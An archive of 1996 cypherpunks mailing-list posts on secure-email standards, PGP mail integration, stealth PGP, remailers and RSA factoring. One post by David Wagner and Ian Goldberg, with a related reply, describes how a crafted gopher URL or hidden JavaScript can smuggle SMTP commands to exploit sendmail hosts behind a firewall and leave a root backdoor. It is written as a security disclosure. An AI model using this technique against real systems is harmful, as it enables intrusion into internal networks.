MIME-Version: 1.0
Content-Type: text/plain


> James M. Galvin said:
> It's my impression that MOSS suffered from lack of representation at this
> workshop.  I got that view from at least 6 different people, so I believe
> it to be true.  That said, I think it's unfair to declare its demise.

I agree with this impression -- I think that MOSS was not represented in any 
meaningful way.  The question that begs to be asked is:  why?

I also agree with the assessment that MOSS was a casualty due to a certain 
extent to the lack of representation.

To recap the purpose of this conference, it was for the interested parties 
involved with security specifications to review their differences, determine 
the requirements, and possibly even to come out with a preferred solution.  If 
the interested parties don't show up, it seems that they are not going to have 
their arguments heard.  In fact, I believe that MOSS is the *only* 
specification that didn't have a significant group of proponents present 
during the entire proceedings.

I knew darn well that we as a group would be gunning down one or more of these 
specifications to simplify the process, and if I wanted anything to say about 
it, then I'd better go.

Before the conference, while this list was forming, I asked Dave Crocker what 
the agenda was, and who specifically was speaking about each specification -- 
the reason I did this is to find out if the *absolute best* representative for 
each specification was speaking, so that we would not end up in a situation 
where the audience was uninformed about a specification, and I could feel that 
the meeting would be productive.  Ultimately, for PGP and S/MIME, it was the 
authors or editors themselves that provided insight into their respective 
specification, and for MSP it was at least one key implementor.

For MOSS, it seemed that the whole contingency (people who were either in 
charge of the specification, who had plans to implement the specification, or 
who were significant customers interested in the specification) was you (an 
author of the specification), and you had to split.  This is not a good sign.  
If the people who cared about MOSS participated in the public forums provided 
for discussing it (mailing lists such as pem-dev), then they would have been 
made aware of this meeting just like the other specification proponents, and 
would have shown up.  You showed up, showed a chart that didn't demonstrate 
MOSS as a clear winner, and didn't stick around to discuss the chart (which I 
thought was a good start to finding The Answer).

This also reminds me of a time when a call went out for the MOSS implementors 
to raise their hands (on the pem-dev list) -- and only Ned Freed answered.  
This could very well be because MOSS implementors don't hang out on the 
mailing list, which is somewhat strange since the timeframe in which this 
question was posed was very close to the release date of the specification 
(10/95).  In fact, Dave Crocker recently said that "Clear, corporate 
commitments from product vendors ought to confirm or dispel the rumor of the 
MOSS demise", and we have not had *any* vendors step up since that statement.

Don't get me wrong -- I don't consider myself to be prejudiced away from MOSS. 
 Near the end of the meeting, I specifically pointed out that:  First we had 
PEM, and it died.  Now we have MOSS, which is 47 pages long, and less than 
*four months* old, and we are calling it dead also.

The answer to that was that it made a great "over beer" question -- a question 
to be discussed over a beer.

Care for a beer?

Blake




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ingle <inglem@adnetsol.com>
Date: Wed, 28 Feb 1996 22:32:45 +0800
To: cypherpunks@toad.com
Subject: PGP to PC mail integration
Message-ID: <199602280818.AAA00108@cryptical.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


Mail user interface integration remains the biggest barrier to
widespread PGP use. As long as it's inconvenient each time you want to
send a mail message, people won't use it. Existing efforts to fix this
are usually mail-program specific (elm-pgp port, some Pegasus and
Eudora hacks) and/or not terribly convenient (ViaCrypt and similar
win-pgp front ends). It seems to me that people are attacking this
problem from the wrong end of the pipe.

Almost all internet mail programs (Eudora, Pegasus, Netscape, Exchange
client with Internet mail, you name it) talk to a POP server and an
SMTP server. They allow you to specify the hostnames of each.

Instead of messing with user interfaces, you set the POP and SMTP
addresses of your mail program to "localhost". You run locally a Visual
Basic program that sits on ports 110 (POP) and 25 (SMTP) listening for
connections. The VB program is configured with the addresses of your
real SMTP and POP servers, and acts as a proxy.

When your mail program retrieves POP mail, it goes through the VB
program, and the VB program decrypts any PGP mail it sees. When it
sends mail, the VB program encrypts any mail it has a PGP key for the
recipient of.

Once this is set up, the user burden is near zero, and it works with
any winsock-based mail program. What do you think of the idea?

						Mike





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blake Ramsdell" <Blaker@msn.com>
Date: Wed, 28 Feb 1996 12:00:35 +0800
To: "Raph Levien" <galvin@eit.com>
Subject: RE:
Message-ID: <UPMAIL01.199602280321100736@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


> Further there is a good implementation of MOSS.  It was even announced at
> the workshop.  Did you miss it?  TIS has done an implementation that is
> available for anonymous FTP, albeit only within the US.  It's integrated
> with MH, not the most favored mail user agent, but the current version has
> shell scripts that perform minimal MIME functions to facilitate integration
> with other agents.

Is there a version that can be used in commercial applications?  There is for 
PGP, S/MIME, and (I think) for MSP.  From a developer's point of view, this 
will influence my decision between specifications.

Blake




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 28 Feb 1996 22:30:49 +0800
To: cypherpunks@toad.com
Subject: Re: PGP source code book sold out!
Message-ID: <199602280833.AAA23425@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 27 Feb 1996, John Gilmore wrote:[..]
> The PGP Source Code book is now out of print.  We assumed there
> would only be limited interest in the source code, so we printed
> only 1500 copies.  When we sold out of this run (just last month),

There are still copies on the shelf at Computer Literacy Bookshops
(408)435-1118 (they mailorder too).


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@orodruin.CS.Berkeley.EDU (David A Wagner)
Date: Wed, 28 Feb 1996 17:28:04 +0800
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: fun with the web and security
In-Reply-To: <Pine.SOL.3.91.960227233313.1545A-100000@chivalry>
Message-ID: <9602280905.AA16242@espresso.CS.Berkeley.EDU.mammoth>
MIME-Version: 1.0
Content-Type: text/plain


> This has been discussed a lot in the URI working groups since around 92. 
> I think it's actually documented in the RFC

Really?  Could you give me any pointers to read up on?

I searched extensively at www.w3.org, and I did find the following
excerpt in RFC1738 under Security Considerations:

   A URL-related security threat is that it is sometimes possible to
   construct a URL such that an attempt to perform a harmless idempotent
   operation such as the retrieval of the object will in fact cause a
   possibly damaging remote operation to occur.  The unsafe URL is
   typically constructed by specifying a port number other than that
   reserved for the network protocol in question.  The client
   unwittingly contacts a server which is in fact running a different
   protocol.  The content of the URL contains instructions which when
   interpreted according to this other protocol cause an unexpected
   operation. An example has been the use of gopher URLs to cause a rude
   message to be sent via a SMTP server.  Caution should be used when
   using any URL which specifies a port number other than the default
   for the protocol, especially when it is a number within the reserved
   space.

I don't think this addresses exactly the same thing I was talking
about-- I'm talking about a way to exploit arbitrary security holes,
even against machines (normally) protected inside a firewall.

It is interesting to see the caution above, though-- I was unaware of
its existence.  I also found the following in the same RFC:

   Care should be taken when URLs contain embedded encoded delimiters
   for a given protocol (for example, CR and LF characters for telnet
   protocols) that these are not unencoded before transmission.  This
   would violate the protocol but could be used to simulate an extra
   operation or parameter, again causing an unexpected and possible
   harmful remote operation to be performed.

which Netscape violates in the gopher: protocol.  However, I also note
that the same RFC specifically addresses the gopher protocol in
Section 3.4.9, and concludes that the client needs to decode embedded
%-escaped newlines and send them as true newlines to the gopher server;
thus, the RFC appears to be self-contradictory, as far as I can tell.
Netscape follows Section 3.4.9.  Furthermore, I should point out that
even if clients were changed so that they didn't unencode %-escaped
newlines in URLs for the gopher: protocol, I believe sendmail bugs
could still be exploited-- Ian has discovered a way to send arbitrary
email messages with arbitrary headers to arbitrary hosts by abusing
the mailto: URL, which should be sufficient to exploit several sendmail
bugs behind a firewall.

So was that what you were talking about, or was there more discussion?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 28 Feb 1996 22:33:27 +0800
To: cypherpunks@toad.com
Subject: Re: Simpler solutions (was Re: Stealth PGP work)
Message-ID: <199602280910.BAA29788@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:45 AM 2/28/96 +0000, "Deranged Mutant" <WlkngOwl@UNiX.asb.com> wrote:
>Adam Back <aba@dcs.ex.ac.uk> wrote:
>
>[lots of stuff about stealth PGP snipped]
>
>This seems to be quite a lot of effort that complicates things. It 
>would be simpler for two stealth communicators to use other means of 
>hiding the fact that a message is PGP'd... (1) stego, in various 
>forms, if done properly would make most attackers not suspect a PGP 
>message is inside something, 

One point of stealth-pgp is to make an encrypted message you _can_
safely hide with stego.  Since the Bad Guys can take your stegofied picture,
destego it, and see the string ------ BEGIN PGP CONTRABAND DATA,
you can't get away with saying "no, that's just a picture of my cat,
blurred a bit because he was moving", which you can if you use a true
stealth version of PGP or other crypto program.

Another major point is to make PGP messages that you can post in public,
which the recipient can decode, but which _don't_ say
"From 007 To 86 and 99" in the headers.  That's easier, but still a bit of work.

>(2) use another encryption program, with 
>a known key shared by two users, that turns the PGP message into pure 
>unmarked 'randomness', 
>[.... (3) a pad-based variant ...]

You're down to key exchange; the big reason for public-key systems is to
avoid it.


#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blake Ramsdell" <Blaker@msn.com>
Date: Wed, 28 Feb 1996 15:31:47 +0800
To: BKnowles@aol.net
Subject: RE: RE: [ Death of MOSS? ]
Message-ID: <UPMAIL01.199602280716350827@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


Brad Knowles said:
>     Obviously a few additional enhancements would be necessary, such
> as cryptographic signatures on return receipts and classification
> labels (as two examples, there may be more), but MOSS is my current
> best yardstick for measuring just how well a secure email standard
> really is integrated into MIME, with the absolute minimal amount of
> disturbance to the existing MIME standard (and thus, making it the
> most "native" MIME implementation of a secure email standard).

Both the PGP and S/MIME specifications propose the use of security multiparts 
-- how come these don't rank as highly as MOSS in your view of how well they 
are integrated with MIME?

Blake




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Wed, 28 Feb 1996 18:28:05 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PGP to PC mail integration
In-Reply-To: <199602280818.AAA00108@cryptical.adnetsol.com>
Message-ID: <199602281009.FAA01583@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mike Ingle writes:
> Instead of messing with user interfaces, you set the POP and SMTP
> addresses of your mail program to "localhost". You run locally a Visual
> Basic program that sits on ports 110 (POP) and 25 (SMTP) listening for
> connections. The VB program is configured with the addresses of your
> real SMTP and POP servers, and acts as a proxy.
> 
> When your mail program retrieves POP mail, it goes through the VB
> program, and the VB program decrypts any PGP mail it sees. When it
> sends mail, the VB program encrypts any mail it has a PGP key for the
> recipient of.

Would you be stuck if you wanted to send something unsigned and/or 
unencrypted ?

-Lewis					"Shit !" -Pres. Richard M. Nixon, 1973




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@ssh.fi>
Date: Wed, 28 Feb 1996 12:33:55 +0800
To: ssh-windows@clinet.fi
Subject: Windows ssh -- this mail was written with it
Message-ID: <199602280347.FAA05139@pilari.ssh.fi>
MIME-Version: 1.0
Content-Type: text/plain


Secveral people have been asking recently about
the status of my windows SSH client.

Well, this mail is being written with it.  I have
finally had time to work on it almost full time
for the last week, and it is finally starting to
work.  The basic protocol is now in farirluy good
condition.  Terminal emulation has been written
(it is VT102, tested to work with vttest)), but
the emulator hasn't been merged to Windows yet
(that should be a couple of days work, max)).

Channel forwarding code is not yet ready, but
probably will in a couple of weeks.  

I will probably make a pre-alpha test distribution
in very near future so that people can get some
hands-on experience with it.  (Eithher stiill durring
this week, or alternatively soon after IETF which
will be next week.  BTW, I wiill give a presentation
on SSH at the IETF.=)

Anyway, this was just to give quick update Ö:-)

(Sorry for the typos in this message, since
emulation is not yet iintegrated it is hard to
edit, and also key mappings won't work properly
until I get the emulatoor in - hopelfully really
really soon.)

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brad@his.com (Brad Knowles)
Date: Wed, 28 Feb 1996 20:54:35 +0800
To: "Blake Ramsdell" <galvin@eit.com>
Subject: RE:
Message-ID: <v01540b11ad59f6e91fcc@brad.his.com>
MIME-Version: 1.0
Content-Type: text/plain


At 7:16 PM 2/27/96, Blake Ramsdell wrote:

> This also reminds me of a time when a call went out for the MOSS implementors
> to raise their hands (on the pem-dev list) -- and only Ned Freed answered.
> This could very well be because MOSS implementors don't hang out on the
> mailing list, which is somewhat strange since the timeframe in which this
> question was posed was very close to the release date of the specification
> (10/95).  In fact, Dave Crocker recently said that "Clear, corporate
> commitments from product vendors ought to confirm or dispel the rumor of the
> MOSS demise", and we have not had *any* vendors step up since that statement.

    Interestingly, I talked to the folks developing the Simeon
IMAP-based MUA (the only cross-platform IMAP MUA that I know of; if
anyone else knows of one, please tell me), and they told me that they
knew of the conference and instead decided to focus on getting the
next version of their client out the door.  And they're claiming to
be implementing MOSS, S/MIME, and PGP (PGP/MIME, I hope?).  Pretty
surprising answer, coming from a company that I think will be so
radically affected by the outcome of that workshop and the continuing
work done by the same community of folks.  I don't even know if
they've got someone subscribed to this mailing list (it sounds like
they don't).


    I have no idea if the rest of the PEM/MOSS commercial community
is like this, but I'm not sure it bodes well for them in particular.
I mean, if it really is a matter of them being small enough that one
key guy can't afford to take a few days out (like both Qualcomm and
Z-Code did), then maybe they're too small to survive the shakeout.
And if it's a matter of them not caring, well....

> Don't get me wrong -- I don't consider myself to be prejudiced away
>from MOSS.
>  Near the end of the meeting, I specifically pointed out that:  First we had
> PEM, and it died.  Now we have MOSS, which is 47 pages long, and less than
> *four months* old, and we are calling it dead also.

    Somebody else made this observation about the age of MOSS at the
workshop, and as I recall Dave's response was something to the effect
of "Uh, it's actually a heck of a lot older than that, the difference
is that the RFC has only been on the streets for four months."

--
Brad Knowles,                                  MIME/PGP: brad@his.com
    comp.mail.sendmail FAQ Maintainer     <http://www.his.com/~brad/>
        finger brad@his.com for my PGP Public Key and Geek Code
The comp.mail.sendmail FAQ is at <http://www.his.com/~brad/sendmail/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu>
Date: Wed, 28 Feb 1996 22:35:17 +0800
To: wlkngowl@unix.asb.com (Mutant Rob)
Subject: Re: Internet shutdown Feb 29?
In-Reply-To: <199602280455.XAA21627@bb.hks.net>
Message-ID: <3134629847e9002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


A few months back, some winos took most of Minnesota off the net
for a couple days. Upset with being kicked out from under a bridge,
they started a fire that took out the main fiber cable from 
downtown to MRNet + the U of M. Backup? Due to a mistake at a CO,
the backup link was routed thru the same area, and was also burned.
Interesting scrambling as nameservers puked and died.  

Mutant Rob said:
> 
> Interesting. My ISP was shut down for a day this week because of a
> "problem with a router upstream from us". <insert emoticon here>
> 
> It would be nice to see ISPs maintain multiple paths or at least have
> a set of backup connections to keep outages like this from happening.
> 
> 
> Simon Spero wrote:
> >
> > As a matter of interest, I wonder how much of the internet could be
> > shut down by concerted effort; obviously individual services can be
> > trivially disabled by jamming listen queues (not really stoppable by
> > anything short of IPSEC w/photuris). The BGP backbone could probably be
> > disabled from within by a traitor planted in one of big companies, and a
> > confused backhoe around the MAEs could probably do a lot more damage than
> > people would like to admit. It seems that the internet is getting pretty
> > brittle- I wonder if it would be worthwhile having some sort of infranet
> > with a bunch of backups links using dial-up lines or spare transponders
> > (with a filter to block port 80 :-)
> >
> > It's probably not possible with  todays routing technology
> > (slow, flappy links with nightmarish convergence times), plus it's not
> > sexy like a nice OC-12 SONET. This is the sort of thing the NCSC should
> > be working on- something to keep the essential services flowing in the
> > early stages of an info-war, or an info truck-bomb
> ---
> [This message has been signed by an auto-signing service.  A valid signature
> means only that it has been received at the address corresponding to the
> signature and forwarded.]


-- 
Kevin L. Prigge         | "You can always spot a well informed man -
University of Minnesota |  his views are the same as yours."  
email: klp@tc.umn.edu   |  - Ilka Chase 
PGP Key Fingerprint =  FC E5 EE E7 8B 2E E9 D5  DA 1C 5D 6B 98 52 F6 24  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mark@ausnetinfo.com.au (Mark)
Date: Wed, 28 Feb 1996 06:45:50 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: "Physical Reality"
In-Reply-To: <2.2.32.19960227181316.0070e158@panix.com>
Message-ID: <199602272141.IAA06008@ausnetinfo.com.au>
MIME-Version: 1.0
Content-Type: text


>Boiled down to its essentials, this argument can be expressed by the lyrics
>of the song "Bad Boys" as used as the theme song of the reality TV show
>"Cops."  For those who no longer participate in the previous culture, they are:
>
>Bad Boys, Bad Boys
>Whatcha gonna do? 
>Whatcha gonna do when they come for you? 
>Bad Boys, Bad Boys
>
>repeat endlessly.
>
>I would suggest instead that the critics of cryptoanarchy are out of touch
>with "physical reality."
>
>For the "Bad Boys" to come for you, a whole series of requirements must be
>in place:
>
>1)  There must be Bad Boys
>2)  They must be able to travel
>3)  There must be a reason for them to come "for you".  They need motivation
>4)  There must be a you
>5)  The Bad Boys must know where you are
>6)  The Bad Boys must be able to travel to where you are
>7)  The answer to the question "Whatcha gonna do?" must be "nothing" (This
>would seem to be implied by the song.)
>8)  They must have something to do to you when they "come for you" otherwise
>the journey is a waste of time.

I dislike having to follow up something so unrelated, but the bad boys are the
criminals, the song is about what will you do when the cops come for you.
The cops are not the "bad boys" in the song. Trust me.

Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Wed, 28 Feb 1996 22:16:51 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Diffie-Hellman for Matchmaking?
In-Reply-To: <313395CB.4343@dcs.rhbnc.ac.uk>
Message-ID: <199602281351.IAA08954@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dimitris Tsapakidis writes:
> Person A is interested to match person B, so he computes
> g^(AB)mod n. B is interested in X, where X may or may not
> be A, and calculates g^(BX)mod n. Now, they compare these
> two "common keys" either using some Zero Knowledge scheme
> that ensures fairness (at no point one party has significantly
> more information than the other) or through a Trusted Third Party.
> If they are the same, then this means X=A, so A and B
> have a match (e.g. a date). The common keys must remain
> secret (hence the ZK above): if g^(BX)mod n "escaped"
> to the public, then the real X would find out that
> B is interested in him.

Could you give us some background on the problem ?  I'm not clear on what
the protocol is trying to achieve in practical terms.

-Lewis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Wed, 28 Feb 1996 22:20:28 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PGP to PC mail integration
In-Reply-To: <2.2.32.19960228133623.0033ccfc@mail.pi.se>
Message-ID: <199602281354.IAA09203@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mike Ingle writes:
> Instead of messing with user interfaces, 

I wrote:
# Would you be stuck if you wanted to send something unsigned and/or 
# unencrypted ?

Matts writes:
% Nope. The VB program should give a popup window where you can enter your
% passphrase to sign/decrypt the message. Such a popup can have a <NO> button
% if you don't want it to do its thing.

Sure sounds like a user interface to me. <shrug>

-Lewis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: johan@eniac.campus.luth.se (Johan Sandberg)
Date: Wed, 28 Feb 1996 20:25:58 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Cypherpunk remailer
Message-ID: <427.6632T768T557@eniac.campus.luth.se>
MIME-Version: 1.0
Content-Type: text/plain


How do I send Email through a cypherpunk remailer?

I know that I encrypt with PGP, but where should I write to who the email is
for???

I have list of remailers and I have their public keys, but it would be nice
if someone could add some remailers to my list!
Public keys to them aswell is appreciated!

There might be some FAQs about this, but never seen one.

 -- Please refer to where I can get the FAQ if there is one! --





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Wed, 28 Feb 1996 21:49:37 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PGP to PC mail integration
Message-ID: <2.2.32.19960228133623.0033ccfc@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 05:09 1996-02-28 -0500, lmccarth@cs.umass.edu wrote:
>Mike Ingle writes:
>> Instead of messing with user interfaces, you set the POP and SMTP
>> addresses of your mail program to "localhost". You run locally a Visual
>> Basic program that sits on ports 110 (POP) and 25 (SMTP) listening for
>> connections. The VB program is configured with the addresses of your
>> real SMTP and POP servers, and acts as a proxy.
>> 
>> When your mail program retrieves POP mail, it goes through the VB
>> program, and the VB program decrypts any PGP mail it sees. When it
>> sends mail, the VB program encrypts any mail it has a PGP key for the
>> recipient of.
>
>Would you be stuck if you wanted to send something unsigned and/or 
>unencrypted ?

Nope. The VB program should give a popup window where you can enter your
passphrase to sign/decrypt the message. Such a popup can have a <NO> button
if you don't want it to do its thing.

But how often do you receive an encrypted letter for which you have the
secret key, and don't want the letter decrypted?

Actually, I was already working on such a program when these posts came by,
so any suggestions to functionality are welcome!

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 29 Feb 1996 02:01:54 +0800
To: rishab@best.com (Rishab Aiyer Ghosh)
Subject: Re: In favour of privacy legislation
In-Reply-To: <199602272249.OAA25257@shellx.best.com>
Message-ID: <199602272250.OAA21228@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


(Costa Rica was just an example. I don't claim that Costa Rica will be
the data haven of choice.)

	Your point about alpha is exactly my point. You give merchant
your alpha address, and they can't do anything valuable with it. No
law necessary.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 29 Feb 1996 08:26:56 +0800
To: cypherpunks@toad.com
Subject: "wisecrackers" by Levy in March Wired
Message-ID: <199602280216.SAA04788@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I sent this to <steven@echoync.com> but the address bounced.
in any case I thougt I would cc: the list. this is a fun
article to read, and I encourage everyone here to check it out.


------- Forwarded Message

To: steven@echoync.com
Subject: wisecrackers feedback
Date: Tue, 27 Feb 96 18:12:02 -0800
From: "Vladimir Z. Nuri" <vznuri@netcom.com>


hello, I'm a cypherpunk subscriber.

I liked your wired article on the cpunks ("wisecrackers")
a lot. I thought I would mention some things:

1. you didn't seem to address the issue that factoring has
not been proven to be difficult. a 
fast factoring algorithm is not ruled out by any existing 
mathematical theories, although no one
expects that one exists. in other words, it is purely
mathematician consensus that insists that factoring is a 
hard problem. hence RSA has not actually been proven to
be a secure way of encoding information. its only secure
because no one knows how to factor numbers quickly, and
everyone is pretty confident that such a capability
does not exist, although no one has proven it (yet).

RSA rests on the
difficulty of undoing a "trapdoor function" and as 
far as I know, there is no proof that any operation used
for cryptography is intrinsically difficult to undo. 
(there are proofs that some functions are "intrinsically
difficult" but they can't be used for crypto, because what
you need in crypto is some operation that "is difficult when
you don't have secret information, but is easy when
you do."-- that is, not "always difficult".
 that's a trapdoor function, such as that used in
RSA-- the secret knowledge makes the operation possible, 
whereas without it, it is "computationally impossible", i.e.
possible in theory but not practice.)

in fact there have been very incremental improvements in
factoring algorithms.  but no one can say, "factoring number [x]
takes exactly [y] years" because no one knows what is the
optimal factoring algorithm-- they only know the 
best one that has been *found* to date. (which is the quadratic
sieve you mention).

the question of whether factoring really is difficult is
interesting to study. there is a whole class of computer 
problems called "NP" that can be shown to be "difficult"
in an equivalent way. whether they are truly "difficult" is
an open question. surprisingly, factoring has not yet been
proven to be in this "NP" class, despite that many other
problems have been. 

also, some mathematicians say that people have been trying
to factor numbers since the dawn of time (well, at least
since the greeks) so that if there was a good algorithm,
we would probably have found it by now. I would argue against
this position, saying that computers are a very recent
invention on the horizon of human knowledge. the study of
algorithmic complexity did not really begin in earnest until
the 70's or so, again an extremely recent blip of time in
regards to the history of human mathematical thought.

2. I think you were overplaying what Morris said to Zimmermann
at the end. it made for good drama but I suspect the truth is
more mundane.  the fact that he asked "how much would the NSA spend for [x]"
(where here [x] is "break PGP keys").
does not imply that they can actually do [x]. rather, what it
implies is that their first inclination is to assume that
something is theoretically possible, and then determine how
much it would cost to do [x]. then, they determine whether
the stategic results of obtaining [x] are worth its cost.

in other words, the NSA has to approach all cryptoanalysis
from this basic point: can we justify the cost based on the
stategic value of the intelligence. they have to make this 
choice all the time as to where they invest their resources
based on the payoff. their first question is, "what is the
strategic value of cracking [x] code". I believe that
they are run internally such that projects that are feasible
and that they have the money are not actually carried out
just because they are possible-- the strategic value has
to be determined.

what Morris was asking Zimmerman was, "how much would it
be worth to an attacker to be able to read PGP messages".
the NSA might well come to the conclusion that nobody important
is using PGP and therefore trying to break it to read their
messages is a waste of time. my opinion is that what was
implied by Morris's position.

frankly, I think the threat of prosecution against Zimmermann
suggests the NSA may not be able to break the RSA cypher at
certain key lengths no matter how much of our tax money they
burn trying.

3. a group broke a 384 bit PGP key a little while ago. I was surprised how
little coverage this got. perhaps it was due to the choice of keys. 
some are more "respectable" than others. <g> Paul Leyland and
Jim Gillogly (Derek Atkins maybe?) were involved as well as some cpunks.


anyway, keep up the good work.

(heh. loved the description of the media outlets as "bottom 
feeders").

bye

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@orodruin.CS.Berkeley.EDU (David A Wagner)
Date: Thu, 29 Feb 1996 08:26:45 +0800
To: cypherpunks@toad.com
Subject: fun with the web and security
Message-ID: <9602280238.AA15724@espresso.CS.Berkeley.EDU.mammoth>
MIME-Version: 1.0
Content-Type: text/plain


Here's a fun way to exploit security holes via the web:
	http://www.cs.berkeley.edu/~daw/js1.html
A rough representation of its contents follow.



Whee! The web is awfully convenient for exploiting security bugs.... 

The following URL contacts your sendmail SMTP server and attempts to exploit
an old, well-known security hole, trying to gain root access. Click _here_
to try it. 

As it stands, clicking on the URL above does not do anything harmful to your
machine-- but it could! (This is a test of the emergency broadcast system.
This is only a test.) 
______________

We can get you to send arbitrary text, to an arbitrary port on an arbitrary
host, from your machine.  (If you are inside a firewall, we can thereby send
arbitrary text to any internal machine by getting you to click on the link
above.) The technique is simple: we list the host and port in a gopher URL,
and encode the text to be sent in the path. 

For instance, a successful exploit of the hole could leave a backdoor root
shell, and inform us via a pseudonym at an anonymous remailer. 

The exploit could be hidden by use of the JavaScript "width=1,height=1"
techniques pioneered at John LoVerso's _JavaScript security hole page_; then
you wouldn't even know when you'd been attacked. 

The exploit could be forced on you via many standard tricks: the Redirect:
or META-EQUIV Refresh: or JavaScript mechanisms work fine, for instance. 

This is most dangerous when you are behind a firewall. Typically, there will
be many machines inside a firewall which run insecure software. Normally,
that would be safe, since the firewall prevents an outsider from connecting
to the unsafe sendmail servers inside-- yet the example URL above allows
outsiders like us to exploit security holes on the inside of your firewall.
Nothing stops us from putting the IP address of a vulnerable machine inside
your firewall in the URL above, and waiting for you to click on it: the
firewall doesn't prevent connections from you to the internal vulnerable
machine, and thus can't stop this attack. Using JavaScript, we don't even
have to wait for you to click on anything. Furthermore, a JavaScript program
could systematically and invisibly try all the machines inside your firewall. 

We could have used many other well-known security holes: there's nothing
special about this particular sendmail bug (except that it was convenient
for us to implement). 
______________

Be afraid. Be very afraid. 
-- Ian Goldberg and David Wagner. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Thu, 29 Feb 1996 02:03:33 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: "wisecrackers" by Levy in March Wired
Message-ID: <v01530503ad59735730c6@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:16 PM 2/27/96, Vladimir Z. Nuri wrote:
>I sent this to <steven@echoync.com> but the address bounced.
                            ^^^

Hmmm...When did Echo move to York New City?

--
Dave Mandl
dmandl@panix.com
http://www.wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: galvin@eit.com (James M. Galvin)
Date: Thu, 29 Feb 1996 01:43:34 +0800
To: "Blake Ramsdell" <Blaker@msn.com>
Subject: RE:
Message-ID: <v02140b1bad5a04853671@[153.37.6.9]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:16 PM 2/27/96, Blake Ramsdell wrote:
>> James M. Galvin said:
>> It's my impression that MOSS suffered from lack of representation at this
>> workshop.  I got that view from at least 6 different people, so I believe
>> it to be true.  That said, I think it's unfair to declare its demise.
>
>I agree with this impression -- I think that MOSS was not represented in any
>meaningful way.  The question that begs to be asked is:  why?

Your comment seems to suggest that the only way to meaningfully contribute
to a discussion of technologies is via face to face meetings.  While I
agree there is a certain expediency to face to face meetings, insofar as
we're talking about email shouldn't we be able to use the technology for
our deliberations?  I'm reminded of my participation in X.400 implementor
meetings where I derived great pleasure from the fact that you couldn't
communicate with most of the members via email at all, let alone X.400.

In response to your question, I don't think there is any one answer any
more than I think there is any one reason why PEM failed.  However, I don't
think the question is moot, since no decision has been made yet and at
least I haven't given up yet, although I know it's uphill from here.

Jim

----------------------------------------------------------------------------
James M. Galvin                                               galvin@eit.com
VeriFone/EIT, PO Box 220, Glenwood, MD 21738                 +1 410.795.6882






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: galvin@eit.com (James M. Galvin)
Date: Thu, 29 Feb 1996 01:15:47 +0800
To: "Blake Ramsdell" <Blaker@msn.com>
Subject: RE:
Message-ID: <v02140b1ead5a06e3c505@[153.37.6.9]>
MIME-Version: 1.0
